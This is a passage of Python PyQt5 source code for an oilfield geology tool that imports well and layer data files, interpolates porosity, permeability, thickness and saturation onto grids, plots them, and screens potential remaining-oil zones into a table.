fig1.setAttribute(Qt.WA_DeleteOnClose)\n 
curIndex = self.ui.tabWidget.addTab(fig1, title) # 添加到tabWidget\n self.ui.tabWidget.setCurrentIndex(curIndex)\n\n floor = CJDYSJ[item.text(0)] # float 型\n floor = np.array(floor)\n floor = floor.T\n floor = floor.tolist()\n wellNum = floor[2]\n x = []\n y = []\n\n\n\n bj1 = 1\n bj2 = 1\n yxhd = []\n yxhd1 = float(floor[13][0])\n kxd = []\n kxd1 = float(floor[14][0])\n stl = []\n stl1 = float(floor[15][0])\n\n for i in range(1,len(floor[0])-1):\n print(i)\n if floor[2][i] == floor[2][i-1]:\n\n yxhd1 = yxhd1 + float(floor[13][i])\n if float(floor[14][i]) == 0:\n kxd1 = kxd1 + float(floor[14][i])\n else:\n bj1 = bj1 + 1\n kxd1 = kxd1 + float(floor[14][i])\n\n if float(floor[15][i]) == 0:\n stl1 = stl1 + float(floor[15][i])\n else:\n bj2 = bj2 + 1\n stl1 = stl1 + float(floor[15][i])\n else:\n for j in range(len(DJDZSJ)):\n if floor[2][i-1] == list(DJDZSJ.keys())[j]:\n if DJDZSJ[list(DJDZSJ.keys())[j]][2] == '0':\n y.append(DJDZSJ[list(DJDZSJ.keys())[j]][0])\n x.append(DJDZSJ[list(DJDZSJ.keys())[j]][1])\n else:\n y.append(DJDZSJ[list(DJDZSJ.keys())[j]][2])\n x.append(DJDZSJ[list(DJDZSJ.keys())[j]][3])\n yxhd.append(str(yxhd1))\n kxd.append(str(kxd1/bj1))\n stl.append(str(stl1/bj2))\n\n bj1 = 1\n bj2 = 1\n yxhd1 = float(floor[13][i])\n kxd1 = float(floor[14][i])\n stl1 = float(floor[15][i])\n\n print(floor[13])\n print(yxhd)\n\n x = np.array(x)\n y = np.array(y)\n yxhd = np.array(yxhd)\n kxd = np.array(kxd)\n stl = np.array(stl)\n\n x = x.T\n y = y.T\n yxhd = yxhd.T\n kxd = kxd.T\n stl = stl.T\n\n print(int(min(x)))\n print(int(max(x)))\n print(int(min(y)))\n print(int(max(y)))\n\n xq = list(range(int(min(x)), int(max(x)), self.stepx))\n yq = list(range(int(min(y)), int(max(y)), self.stepy))\n\n xq = np.array(xq)\n yq = np.array(yq)\n\n xq, yq = np.meshgrid(xq, yq)\n\n yxhdq = griddata((x, y), yxhd, (xq, yq), method=\"linear\")\n kxdq = griddata((x, y), kxd, (xq, yq), method=\"linear\")\n stlq = griddata((x, y), stl, (xq, yq), method=\"linear\")\n\n # # for i in range(vq.shape[0]):\n # # for j in range(vq.shape[1]):\n # # if np.isnan(vq[i][j]) == False:\n # # vq[i][j] = vq[i][j].astype(int)\n\n ax1 = fig1.fig.add_subplot(1, 1, 1, label=\"sin-cos plot\") # 子图1\n ax1.set_xlabel('X 轴') # X轴标题\n ax1.set_ylabel('Y 轴') # Y轴标题\n ax1.set_title(title+\"有效厚度展示\")\n\n title = itemParent.text(0) + \":\" + item.text(0)\n fig2 = QmyFigure(self)\n fig2.setAttribute(Qt.WA_DeleteOnClose)\n curIndex = self.ui.tabWidget.addTab(fig2, title) # 添加到tabWidget\n self.ui.tabWidget.setCurrentIndex(curIndex)\n\n ax2 = fig2.fig.add_subplot(1, 1, 1, label=\"sin-cos plot\") # 子图2\n ax2.set_xlabel('X 轴') # X轴标题\n ax2.set_ylabel('Y 轴') # Y轴标题\n ax2.set_title(title+\"孔隙度展示\")\n\n title = itemParent.text(0) + \":\" + item.text(0)\n fig3 = QmyFigure(self)\n fig3.setAttribute(Qt.WA_DeleteOnClose)\n curIndex = self.ui.tabWidget.addTab(fig3, title) # 添加到tabWidget\n self.ui.tabWidget.setCurrentIndex(curIndex)\n\n ax3 = fig3.fig.add_subplot(1, 1, 1, label=\"sin-cos plot\") # 子图3\n ax3.set_xlabel('X 轴') # X轴标题\n ax3.set_ylabel('Y 轴') # Y轴标题\n ax3.set_title(title+\"渗透率展示\")\n\n im1 = ax1.pcolormesh(xq, yq, yxhdq)\n fig1.fig.colorbar(im1, ax=ax1)\n\n im2 = ax2.pcolormesh(xq, yq, kxdq)\n fig2.fig.colorbar(im2, ax=ax2)\n\n im3 = ax3.pcolormesh(xq, yq, stlq)\n fig3.fig.colorbar(im3, ax=ax3)\n\n fig1.fig.canvas.draw() ##刷新\n\n fig2.fig.canvas.draw() ##刷新\n\n fig3.fig.canvas.draw() ##刷新\n print(item.text(0))\n\n except AttributeError:\n print(\"AttributeError\")\n\n ##导入沉积相数据\n @pyqtSlot()\n def on_actiongfd_triggered(self):\n\n 
print(\"test\")\n curDir = QDir.currentPath()\n aDir = QFileDialog.getExistingDirectory(self, \"选择一个目录\",\n curDir, QFileDialog.ShowDirsOnly)\n dirObj = QDir(aDir)\n strList = dirObj.entryList(QDir.Files)\n\n labText = \"正在导入文件...\" # 文本信息\n btnText = \"取消\" # \"取消\"按钮的标题\n minV = 0\n maxV = len(strList)\n\n dlgProgress = QProgressDialog(labText, btnText, minV, maxV, self)\n dlgProgress.setWindowTitle(\"导入文件\")\n dlgProgress.setWindowModality(Qt.WindowModal) # 模态对话框\n dlgProgress.setAutoReset(True) # value()达到最大值时自动调用reset()\n dlgProgress.setAutoClose(True) # 调用reset()时隐藏窗口\n i = 1\n for str in strList:\n # self.progressBar.setValue(i)\n dlgProgress.setValue(i)\n dlgProgress.setLabelText(\"正在导入文件,第 %d 个\" % i)\n\n floor = []\n x = []\n y = []\n phase = [] ##相\n fileName = re.findall(\".*\\.txt\", str)\n if fileName != []:\n # print(fileName[0][0:-4])\n filePath = aDir + \"/\" + fileName[0]\n # print(filePath)\n fileDevice = QFile(filePath)\n fileDevice.open(QIODevice.ReadOnly | QIODevice.Text)\n try:\n fileStream = QTextStream(fileDevice)\n fileStream.setAutoDetectUnicode(True) # 自动检测Unicode\n fileStream.setCodec(\"GBK\") # 必须设置编码,否则不能正常显示汉字\n while not fileStream.atEnd():\n lineStr = fileStream.readLine() # 返回QByteArray类型\n # print(lineStr)\n\n lineList = lineStr.split(\" \")\n x.append(float(lineList[0]))\n y.append(float(lineList[1]))\n phase.append(float(lineList[2]))\n\n\n\n except UnicodeDecodeError:\n print(fileName[0] + \"文件编码格式有误!\")\n\n\n finally:\n fileDevice.close()\n\n floor.append(x) # 将读取出的数据按列表形式存储\n floor.append(y) # 将读取出的数据按列表形式存储\n floor.append(phase) # 将读取出的数据按列表形式存储\n f = np.array(floor)\n print(f.shape)\n CJX[fileName[0][0:-4]] = floor # 用文件名作为键值将不同文件的数据存储在字典中\n item = QTreeWidgetItem()\n item.setText(0, fileName[0][0:-4])\n item.setIcon(0, QtGui.QIcon('images/29.ico'))\n self.ui.treeWidget.topLevelItem(0).child(2).addChild(item)\n i = i + 1\n\n self.ui.treeWidget.topLevelItem(0).child(2).setExpanded(True)\n\n # print(self.CJX[\"S21\"])\n\n @pyqtSlot()\n def on_actionBHD_triggered(self):\n # print(\"test\")\n curDir = QDir.currentPath()\n aDir = QFileDialog.getExistingDirectory(self, \"选择一个目录\",\n curDir, QFileDialog.ShowDirsOnly)\n dirObj = QDir(aDir)\n strList = dirObj.entryList(QDir.Files)\n # print(strList)\n labText = \"正在导入文件...\" # 文本信息\n btnText = \"取消\" # \"取消\"按钮的标题\n minV = 0\n maxV = len(strList)\n dlgProgress = QProgressDialog(labText, btnText, minV, maxV, self)\n dlgProgress.setWindowTitle(\"导入文件\")\n dlgProgress.setWindowModality(Qt.WindowModal) # 模态对话框\n dlgProgress.setAutoReset(True) # value()达到最大值时自动调用reset()\n dlgProgress.setAutoClose(True) # 调用reset()时隐藏窗口\n i = 1\n for str in strList:\n dlgProgress.setValue(i)\n dlgProgress.setLabelText(\"正在复制文件,第 %d 个\" % i)\n floor = []\n x = []\n y = []\n phase = [] ##相\n fileName = re.findall(\".*\\.txt\", str)\n if fileName != []:\n # print(fileName[0][0:-4])\n filePath = aDir + \"/\" + fileName[0]\n\n self.ui.comboBox.addItem(fileName[0][0:-4])\n\n self.qlqFloor.append(fileName[0][0:-4])\n\n # print(filePath)\n fileDevice = QFile(filePath)\n fileDevice.open(QIODevice.ReadOnly | QIODevice.Text)\n try:\n fileStream = QTextStream(fileDevice)\n fileStream.setAutoDetectUnicode(True) # 自动检测Unicode\n fileStream.setCodec(\"GBK\") # 必须设置编码,否则不能正常显示汉字\n while not fileStream.atEnd():\n lineStr = fileStream.readLine() # 返回QByteArray类型\n\n lineList = lineStr.split(\"\\t\")\n x.append(float(lineList[0]))\n y.append(float(lineList[1]))\n phase.append(float(lineList[2]))\n\n\n\n except UnicodeDecodeError:\n 
print(fileName[0] + \"文件编码格式有误!\")\n\n\n finally:\n fileDevice.close()\n\n floor.append(x) # 将读取出的数据按列表形式存储\n floor.append(y) # 将读取出的数据按列表形式存储\n floor.append(phase) # 将读取出的数据按列表形式存储\n f = np.array(floor)\n print(f.shape)\n BHD[fileName[0][0:-4]] = floor # 用文件名作为键值将不同文件的数据存储在字典中\n item = QTreeWidgetItem()\n item.setText(0, fileName[0][0:-4])\n item.setIcon(0, QtGui.QIcon('images/29.ico'))\n self.ui.treeWidget.topLevelItem(0).child(4).addChild(item)\n i = i + 1\n\n self.ui.treeWidget.topLevelItem(0).child(4).setExpanded(True)\n # print(self.CJX[\"S21\"])\n\n @pyqtSlot()\n def on_actionKXD_triggered(self):\n # print(\"test\")\n curDir = QDir.currentPath()\n aDir = QFileDialog.getExistingDirectory(self, \"选择一个目录\",\n curDir, QFileDialog.ShowDirsOnly)\n dirObj = QDir(aDir)\n strList = dirObj.entryList(QDir.Files)\n # print(strList)\n labText = \"正在导入文件...\" # 文本信息\n btnText = \"取消\" # \"取消\"按钮的标题\n minV = 0\n maxV = len(strList)\n dlgProgress = QProgressDialog(labText, btnText, minV, maxV, self)\n dlgProgress.setWindowTitle(\"导入文件\")\n dlgProgress.setWindowModality(Qt.WindowModal) # 模态对话框\n dlgProgress.setAutoReset(True) # value()达到最大值时自动调用reset()\n dlgProgress.setAutoClose(True) # 调用reset()时隐藏窗口\n i = 1\n for str in strList:\n\n dlgProgress.setValue(i)\n dlgProgress.setLabelText(\"正在复制文件,第 %d 个\" % i)\n\n floor = []\n x = []\n y = []\n phase = [] ##相\n fileName = re.findall(\".*\\.txt\", str)\n if fileName != []:\n # print(fileName[0][0:-4])\n filePath = aDir + \"/\" + fileName[0]\n # print(filePath)\n fileDevice = QFile(filePath)\n fileDevice.open(QIODevice.ReadOnly | QIODevice.Text)\n try:\n fileStream = QTextStream(fileDevice)\n fileStream.setAutoDetectUnicode(True) # 自动检测Unicode\n fileStream.setCodec(\"GBK\") # 必须设置编码,否则不能正常显示汉字\n while not fileStream.atEnd():\n lineStr = fileStream.readLine() # 返回QByteArray类型\n\n lineList = lineStr.split(\"\\t\")\n x.append(float(lineList[0]))\n y.append(float(lineList[1]))\n phase.append(float(lineList[2]))\n\n\n\n except UnicodeDecodeError:\n print(fileName[0] + \"文件编码格式有误!\")\n\n\n finally:\n fileDevice.close()\n\n floor.append(x) # 将读取出的数据按列表形式存储\n floor.append(y) # 将读取出的数据按列表形式存储\n floor.append(phase) # 将读取出的数据按列表形式存储\n f = np.array(floor)\n print(f.shape)\n KXD[fileName[0][0:-4]] = floor # 用文件名作为键值将不同文件的数据存储在字典中\n item = QTreeWidgetItem()\n item.setText(0, fileName[0][0:-4])\n item.setIcon(0, QtGui.QIcon('images/29.ico'))\n self.ui.treeWidget.topLevelItem(0).child(0).addChild(item)\n i = i + 1\n\n self.ui.treeWidget.topLevelItem(0).child(0).setExpanded(True)\n # print(self.CJX[\"S21\"])\n\n @pyqtSlot()\n def on_actionSTL_triggered(self):\n # print(\"test\")\n curDir = QDir.currentPath()\n aDir = QFileDialog.getExistingDirectory(self, \"选择一个目录\",\n curDir, QFileDialog.ShowDirsOnly)\n dirObj = QDir(aDir)\n strList = dirObj.entryList(QDir.Files)\n # print(strList)\n\n labText = \"正在导入文件...\" # 文本信息\n btnText = \"取消\" # \"取消\"按钮的标题\n minV = 0\n maxV = len(strList)\n dlgProgress = QProgressDialog(labText, btnText, minV, maxV, self)\n dlgProgress.setWindowTitle(\"导入文件\")\n dlgProgress.setWindowModality(Qt.WindowModal) # 模态对话框\n dlgProgress.setAutoReset(True) # value()达到最大值时自动调用reset()\n dlgProgress.setAutoClose(True) # 调用reset()时隐藏窗口\n i = 1\n\n for str in strList:\n\n dlgProgress.setValue(i)\n dlgProgress.setLabelText(\"正在复制文件,第 %d 个\" % i)\n\n floor = []\n x = []\n y = []\n phase = [] ##相\n fileName = re.findall(\".*\\.txt\", str)\n if fileName != []:\n\n # print(fileName[0][0:-4])\n filePath = aDir + \"/\" + fileName[0]\n # print(filePath)\n fileDevice 
= QFile(filePath)\n fileDevice.open(QIODevice.ReadOnly | QIODevice.Text)\n try:\n fileStream = QTextStream(fileDevice)\n fileStream.setAutoDetectUnicode(True) # auto-detect Unicode\n fileStream.setCodec(\"GBK\") # the codec must be set, otherwise Chinese characters are garbled\n while not fileStream.atEnd():\n lineStr = fileStream.readLine() # read one line of text\n\n lineList = lineStr.split(\"\\t\")\n x.append(float(lineList[0]))\n y.append(float(lineList[1]))\n phase.append(float(lineList[2]))\n\n\n\n except UnicodeDecodeError:\n print(fileName[0] + \"文件编码格式有误!\")\n\n\n finally:\n fileDevice.close()\n\n floor.append(x) # store the parsed columns as lists\n floor.append(y) # store the parsed columns as lists\n floor.append(phase) # store the parsed columns as lists\n f = np.array(floor)\n print(f.shape)\n STL[fileName[0][0:-4]] = floor # keyed by file name, one dict entry per imported file\n item = QTreeWidgetItem()\n item.setText(0, fileName[0][0:-4])\n item.setIcon(0, QtGui.QIcon('images/29.ico'))\n self.ui.treeWidget.topLevelItem(0).child(1).addChild(item)\n i = i + 1\n\n self.ui.treeWidget.topLevelItem(0).child(1).setExpanded(True)\n # print(self.CJX[\"S21\"])\n\n # import single-well geology data\n @pyqtSlot()\n def on_actiondjdzsj_triggered(self):\n\n curPath = QDir.currentPath() # current working directory\n title = \"打开一个文件\"\n filt = \"文本文件(*.txt);;所有文件(*.*)\"\n fileName, flt = QFileDialog.getOpenFileName(self, title, curPath, filt)\n\n if fileName != \"\":\n fileDevice = QFile(fileName)\n fileDevice.open(QIODevice.ReadOnly | QIODevice.Text)\n try:\n fileStream = QTextStream(fileDevice)\n fileStream.setAutoDetectUnicode(True) # auto-detect Unicode\n fileStream.setCodec(\"GBK\") # the codec must be set, otherwise Chinese characters are garbled\n i = 1\n while not fileStream.atEnd():\n\n lineStr = fileStream.readLine() # read one line of text\n lineList = lineStr.split(\"\\t\")\n\n if lineList[0] != str(i):\n continue\n\n DJDZSJ[lineList[1]] = lineList[2:]\n item = QTreeWidgetItem()\n item.setText(0, lineList[1])\n\n self.ui.treeWidget.topLevelItem(1).child(4).addChild(item)\n i = i + 1\n\n\n\n except UnicodeDecodeError:\n print(fileName + \"文件编码格式有误!\") # fileName is the full path here, not a list\n\n finally:\n fileDevice.close()\n\n # print(self.DJDZSJ[-1])\n\n item = QTreeWidgetItem()\n item.setText(0, \"单井地质数据\")\n item.setIcon(0, QtGui.QIcon('images/29.ico'))\n # self.ui.treeWidget.topLevelItem(1).child(4).addChild(item)\n self.ui.treeWidget.topLevelItem(1).child(4).setExpanded(True)\n\n @pyqtSlot()\n def on_actionxspmsj_triggered(self):\n curPath = QDir.currentPath() # current working directory\n title = \"打开一个文件\"\n filt = \"文本文件(*.txt);;所有文件(*.*)\"\n fileName, flt = QFileDialog.getOpenFileName(self, title, curPath, filt)\n\n if fileName != \"\":\n fileDevice = QFile(fileName)\n fileDevice.open(QIODevice.ReadOnly | QIODevice.Text)\n try:\n fileStream = QTextStream(fileDevice)\n fileStream.setAutoDetectUnicode(True) # auto-detect Unicode\n fileStream.setCodec(\"GBK\") # the codec must be set, otherwise Chinese characters are garbled\n while not fileStream.atEnd():\n lineStr = fileStream.readLine() # read one line of text\n\n lineList = lineStr.split(\"\\t\")\n\n XSPMSJ.append(lineList)\n\n except UnicodeDecodeError:\n print(fileName + \"文件编码格式有误!\")\n\n finally:\n fileDevice.close()\n\n # print(self.XSPMSJ[-1])\n\n item = QTreeWidgetItem()\n item.setText(0, \"吸水剖面数据\")\n item.setIcon(0, QtGui.QIcon('images/29.ico'))\n self.ui.treeWidget.topLevelItem(1).child(3).addChild(item)\n self.ui.treeWidget.topLevelItem(1).child(3).setExpanded(True)\n\n @pyqtSlot()\n def on_actionsksj_triggered(self):\n curPath = QDir.currentPath() # current working directory\n title = \"打开一个文件\"\n filt = \"文本文件(*.txt);;所有文件(*.*)\"\n fileName, flt = QFileDialog.getOpenFileName(self, title, curPath, filt)\n\n if fileName != \"\":\n fileDevice = QFile(fileName)\n 
fileDevice.open(QIODevice.ReadOnly | QIODevice.Text)\n try:\n fileStream = QTextStream(fileDevice)\n fileStream.setAutoDetectUnicode(True) # auto-detect Unicode\n fileStream.setCodec(\"GBK\") # the codec must be set, otherwise Chinese characters are garbled\n while not fileStream.atEnd():\n lineStr = fileStream.readLine() # read one line of text\n\n lineList = lineStr.split(\"\\t\")\n XSPMSJ.append(lineList) # NOTE: perforation rows go into the same XSPMSJ list as the water-absorption profile data\n\n except UnicodeDecodeError:\n print(fileName + \"文件编码格式有误!\")\n\n finally:\n fileDevice.close()\n\n # print(self.XSPMSJ[-1])\n\n item = QTreeWidgetItem()\n item.setText(0, \"射孔数据\")\n item.setIcon(0, QtGui.QIcon('images/29.ico'))\n self.ui.treeWidget.topLevelItem(1).child(2).addChild(item)\n self.ui.treeWidget.topLevelItem(1).child(2).setExpanded(True)\n\n @pyqtSlot()\n def on_actioncssj_triggered(self):\n curPath = QDir.currentPath() # current working directory\n title = \"打开一个文件\"\n filt = \"文本文件(*.txt);;所有文件(*.*)\"\n fileName, flt = QFileDialog.getOpenFileName(self, title, curPath, filt)\n\n if fileName != \"\":\n fileDevice = QFile(fileName)\n fileDevice.open(QIODevice.ReadOnly | QIODevice.Text)\n try:\n fileStream = QTextStream(fileDevice)\n fileStream.setAutoDetectUnicode(True) # auto-detect Unicode\n fileStream.setCodec(\"GBK\") # the codec must be set, otherwise Chinese characters are garbled\n while not fileStream.atEnd():\n lineStr = fileStream.readLine() # read one line of text\n\n lineList = lineStr.split(\"\\t\")\n CSSJ.append(lineList)\n\n except UnicodeDecodeError:\n print(fileName + \"文件编码格式有误!\")\n\n finally:\n fileDevice.close()\n\n # print(self.XSPMSJ[-1])\n\n item = QTreeWidgetItem()\n item.setText(0, \"措施数据\")\n item.setIcon(0, QtGui.QIcon('images/29.ico'))\n self.ui.treeWidget.topLevelItem(1).child(5).addChild(item)\n self.ui.treeWidget.topLevelItem(1).child(5).setExpanded(True)\n\n @pyqtSlot()\n def on_actioncjdysj_triggered(self):\n curPath = QDir.currentPath() # current working directory\n title = \"打开一个文件\"\n filt = \"文本文件(*.txt);;所有文件(*.*)\"\n fileName, flt = QFileDialog.getOpenFileName(self, title, curPath, filt)\n\n if fileName != \"\":\n fileDevice = QFile(fileName)\n fileDevice.open(QIODevice.ReadOnly | QIODevice.Text)\n try:\n fileStream = QTextStream(fileDevice)\n fileStream.setAutoDetectUnicode(True) # auto-detect Unicode\n fileStream.setCodec(\"GBK\") # the codec must be set, otherwise Chinese characters are garbled\n i = 0\n while not fileStream.atEnd():\n i = i + 1\n lineStr = fileStream.readLine() # read one line of text\n lineList = lineStr.split(\"\\t\")\n\n if i == 1:\n continue # skip the header row\n\n floor1 = lineList[0] # row number, used as the key in CJDYZB\n CJDYZB[floor1] = []\n CJDYZB[floor1].append(lineList)\n\n floor = lineList[3] + \"-\" + lineList[4] # merged layer number\n if floor in CJDYSJ:\n CJDYSJ[floor].append(lineList)\n else:\n CJDYSJ[floor] = []\n CJDYSJ[floor].append(lineList)\n item = QTreeWidgetItem()\n item.setText(0, floor)\n item.setIcon(0, QtGui.QIcon('images/29.ico'))\n\n self.ui.treeWidget.topLevelItem(1).child(1).addChild(item)\n\n except UnicodeDecodeError:\n print(fileName + \"文件编码格式有误!\")\n\n finally:\n fileDevice.close()\n\n # item = QTreeWidgetItem()\n # item.setText(0, \"沉积单元数据\")\n # self.ui.treeWidget.topLevelItem(1).child(1).addChild(item)\n self.ui.treeWidget.topLevelItem(1).child(1).setExpanded(True)\n\n @pyqtSlot()\n def on_actionzsjs_triggered(self):\n curPath = QDir.currentPath() # current working directory\n title = \"打开一个文件\"\n filt = \"文本文件(*.txt);;所有文件(*.*)\"\n fileName, flt = QFileDialog.getOpenFileName(self, title, curPath, filt)\n\n if fileName != \"\":\n fileDevice = QFile(fileName)\n fileDevice.open(QIODevice.ReadOnly | QIODevice.Text)\n try:\n fileStream = QTextStream(fileDevice)\n fileStream.setAutoDetectUnicode(True) # auto-detect Unicode\n fileStream.setCodec(\"GBK\") # the codec must be set, otherwise Chinese characters are garbled\n 
while not fileStream.atEnd():\n lineStr = fileStream.readLine() # read one line of text\n\n lineList = lineStr.split(\"\\t\")\n ZSJS.append(lineList)\n\n except UnicodeDecodeError:\n print(fileName + \"文件编码格式有误!\")\n\n finally:\n fileDevice.close()\n\n # print(self.XSPMSJ[-1])\n\n item = QTreeWidgetItem()\n item.setText(0, \"注水井史\")\n item.setIcon(0, QtGui.QIcon('images/29.ico'))\n self.ui.treeWidget.topLevelItem(1).child(0).addChild(item)\n self.ui.treeWidget.topLevelItem(1).child(0).setExpanded(True)\n\n @pyqtSlot()\n def on_actionfsd_triggered(self):\n newWindow = CSw_dcfbx_Slot.QmyMainWindow(self)\n newWindow.show()\n\n @pyqtSlot()\n def on_pushButton_2_clicked(self):\n self.stepx = int(self.ui.lineEdit.text())\n self.stepy = int(self.ui.lineEdit_2.text())\n\n print(self.stepx)\n print(self.stepy)\n print(\"pushButton_2\")\n\n @pyqtSlot()\n def on_pushButton_3_clicked(self):\n\n headerText = [\"潜力区序号\", \"层号\", \"平面规模\", \"平均含油饱和度\", \"平均有效厚度\", \"平均渗透率\",\"平均孔隙度\",\"剩余油量\",\"井数量\",\"平均水淹程度\"]\n self.ui.tableWidget.setColumnCount(len(headerText))\n self.ui.tableWidget.setHorizontalHeaderLabels(headerText)\n self.ui.tableWidget.clearContents()\n\n\n labText = \"正在导入文件...\" # label text\n btnText = \"取消\" # caption of the \"Cancel\" button\n minV = 0\n maxV = len(self.qlqFloor)\n\n dlgProgress = QProgressDialog(labText, btnText, minV, maxV, self)\n dlgProgress.setWindowTitle(\"筛选数据\")\n dlgProgress.setWindowModality(Qt.WindowModal) # modal dialog\n dlgProgress.setAutoReset(True) # reset() is called automatically when value() reaches the maximum\n dlgProgress.setAutoClose(True) # hide the dialog when reset() is called\n\n pross = 1\n index = 0\n for qlqFloorName in self.qlqFloor:\n\n\n dlgProgress.setValue(pross)\n dlgProgress.setLabelText(\"正在筛选数据,第 %d 个\" % pross)\n\n x = BHD[qlqFloorName][0] # float values\n y = BHD[qlqFloorName][1]\n v = BHD[qlqFloorName][2]\n\n for i in range(len(v)):\n if v[i] == -999:\n v[i] = 0\n\n x = np.array(x)\n y = np.array(y)\n v = np.array(v)\n\n x = x.T\n y = y.T\n v = v.T\n\n xb = list(range(int(min(x)), int(max(x)), self.stepx))\n yb = list(range(int(min(y)), int(max(y)), self.stepy))\n\n xb = np.array(xb)\n yb = np.array(yb)\n\n xb, yb = np.meshgrid(xb, yb)\n\n bhdq = griddata((x, y), v, (xb, yb), method=\"linear\")\n\n floor = CJDYSJ[qlqFloorName] # float values\n sycd = {} # water-flooding degree per well; never populated here, so the lookup further down always raises KeyError\n\n floor = np.array(floor)\n floor = floor.T\n floor = floor.tolist()\n # wellNum = floor[2]\n x = []\n y = []\n\n bj1 = 1\n bj2 = 1\n yxhd = []\n yxhd1 = float(floor[13][0])\n kxd = []\n kxd1 = float(floor[14][0])\n stl = []\n stl1 = float(floor[15][0])\n wellNum = []\n\n for i in range(1, len(floor[0]) - 1):\n if floor[2][i] == floor[2][i - 1]:\n\n yxhd1 = yxhd1 + float(floor[13][i])\n if float(floor[14][i]) == 0:\n kxd1 = kxd1 + float(floor[14][i])\n else:\n bj1 = bj1 + 1\n kxd1 = kxd1 + float(floor[14][i])\n\n if float(floor[15][i]) == 0:\n stl1 = stl1 + float(floor[15][i])\n else:\n bj2 = bj2 + 1\n stl1 = stl1 + float(floor[15][i])\n else:\n for j in range(len(DJDZSJ)):\n if floor[2][i - 1] == list(DJDZSJ.keys())[j]:\n if DJDZSJ[list(DJDZSJ.keys())[j]][2] == '0':\n y.append(DJDZSJ[list(DJDZSJ.keys())[j]][0])\n x.append(DJDZSJ[list(DJDZSJ.keys())[j]][1])\n else:\n y.append(DJDZSJ[list(DJDZSJ.keys())[j]][2])\n x.append(DJDZSJ[list(DJDZSJ.keys())[j]][3])\n wellNum.append(floor[2][i - 1])\n yxhd.append(yxhd1) # keep numeric values so griddata can interpolate them\n kxd.append(kxd1 / bj1)\n stl.append(stl1 / bj2)\n\n bj1 = 1\n bj2 = 1\n yxhd1 = float(floor[13][i])\n kxd1 = float(floor[14][i])\n stl1 = float(floor[15][i])\n\n x = np.array(x)\n y = np.array(y)\n yxhd = np.array(yxhd)\n stl = np.array(stl)\n kxd = np.array(kxd)\n\n
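 # What follows is the potential-zone screening pipeline: interpolate the\n # per-well averages onto the same grid as the saturation data, flag every\n # cell passing all three cutoffs (permeability stlq > 0.15, saturation\n # bhdq > 0.45, effective thickness yxhdq > 2) into a 0/1 mask, trace the\n # mask outlines with skimage.measure.find_contours, and size-filter them\n # with cv2.minAreaRect before tabulating per-zone statistics.\n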
 x = x.T\n y = y.T\n yxhd = yxhd.T\n stl = stl.T\n kxd = kxd.T\n\n yxhdq = griddata((x, y), yxhd, (xb, yb), method=\"linear\")\n stlq = griddata((x, y), stl, (xb, yb), method=\"linear\")\n kxdq = griddata((x, y), kxd, (xb, yb), method=\"linear\")\n\n # print(yxhdq.shape)\n # print(stlq.shape)\n # print(bhdq.shape)\n\n\n qlq = yxhdq.copy()\n\n for i in range(bhdq.shape[0]):\n for j in range(bhdq.shape[1]):\n if not np.isnan(bhdq[i][j]) and not np.isnan(stlq[i][j]) and not np.isnan(yxhdq[i][j]):\n if stlq[i][j] > 0.15 and bhdq[i][j] > 0.45 and yxhdq[i][j] > 2:\n qlq[i][j] = 1\n else:\n qlq[i][j] = 0\n\n self.qlqBinary[qlqFloorName] = qlq\n self.qlqXb[qlqFloorName] = xb\n self.qlqYb[qlqFloorName] = yb\n\n\n contours = measure.find_contours(qlq, 0.4)\n\n\n # convert grid indices to map coordinates\n for n, contour in enumerate(contours):\n for i in range(contour.shape[0]):\n xcontour = round(contour[i][1])\n ycontour = round(contour[i][0])\n\n contour[i][1] = xcontour * self.stepx + xb[0][0]\n contour[i][0] = ycontour * self.stepy + yb[0][0]\n\n areaX = int(self.ui.lineEdit_3.text())\n areaY = int(self.ui.lineEdit_4.text())\n\n self.qlqContours[qlqFloorName] = []\n\n for _, contour in enumerate(contours):\n qlqTableRow = {}\n\n contour = np.float32(contour)\n # compute the minimum-area bounding rectangle\n rect = cv2.minAreaRect(contour)\n area = cv2.contourArea(contour)\n qlqTableRow[\"floor\"] = qlqFloorName\n qlqTableRow[\"area\"] = area\n\n # extract the rectangle's key parameters\n center, size, angle = rect\n width, height = size\n if width > areaX and height > areaY: # keep only zones larger than the user-specified minimum extent\n index = index + 1\n qlqTableRow[\"index\"] = index\n\n self.qlqContours[qlqFloorName].append(contour)\n minx = min(contour[:,1])\n miny = min(contour[:,0])\n maxx = max(contour[:,1])\n maxy = max(contour[:,0])\n well = []\n\n x = np.float32(x)\n y = np.float32(y)\n\n for i in range(len(wellNum)):\n if minx < x[i] < maxx and miny < y[i] < maxy:\n well.append(wellNum[i])\n\n qlqTableRow[\"well\"] = well\n\n n = 0\n sumStl = 0\n sumYxhd = 0\n sumBhd = 0\n sumKxd = 0\n for i in range(bhdq.shape[0]):\n for j in range(bhdq.shape[1]):\n if minx <= xb[i][j] <= maxx and miny <= yb[i][j] <= maxy and qlq[i][j] == 1:\n n = n + 1\n sumBhd = sumBhd + bhdq[i][j]\n sumStl = sumStl + stlq[i][j]\n sumYxhd = sumYxhd + yxhdq[i][j]\n sumKxd = sumKxd + kxdq[i][j]\n\n # assumes n > 0, i.e. at least one flagged grid cell inside the rectangle\n avStl = sumStl / n\n avBhd = sumBhd / n\n avYxhd = sumYxhd / n\n avKxd = sumKxd / n\n qlqTableRow[\"avStl\"] = avStl\n qlqTableRow[\"avBhd\"] = avBhd\n qlqTableRow[\"avYxhd\"] = avYxhd\n qlqTableRow[\"avKxd\"] = avKxd\n qlqTableRow[\"syyl\"] = avKxd * avBhd * avYxhd * area\n avsycd = ''\n D = 0\n Z = 0\n G = 0\n for i in well:\n try:\n if sycd[i] == 'D':\n D = D + 1\n if sycd[i] == 'Z':\n Z = Z + 1\n if sycd[i] == 'G':\n G = G + 1\n except KeyError:\n print(\"no water-flooding degree recorded for well\", i)\n\n if G > Z and G > D:\n avsycd = \"高\"\n if Z > G and Z > D:\n avsycd = \"中\"\n if D > G and D > Z:\n avsycd = \"低\"\n\n qlqTableRow[\"avsycd\"] = avsycd\n self.qlqTable[index] = qlqTableRow\n\n print(\"pushButton_3\")\n pross = pross + 1\n self.ui.tableWidget.setRowCount(index)\n self.ui.tableWidget.setAlternatingRowColors(True)\n\n\n for i in range(1, index + 1): # qlqTable keys run 1..index, so include the last zone\n listrow = []\n\n # potential-zone index\n listrow.append(self.qlqTable[i][\"index\"])\n self.ui.comboBox_2.addItem(str(self.qlqTable[i][\"index\"]))\n item = QTableWidgetItem(str(self.qlqTable[i][\"index\"]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # disallow editing the text\n 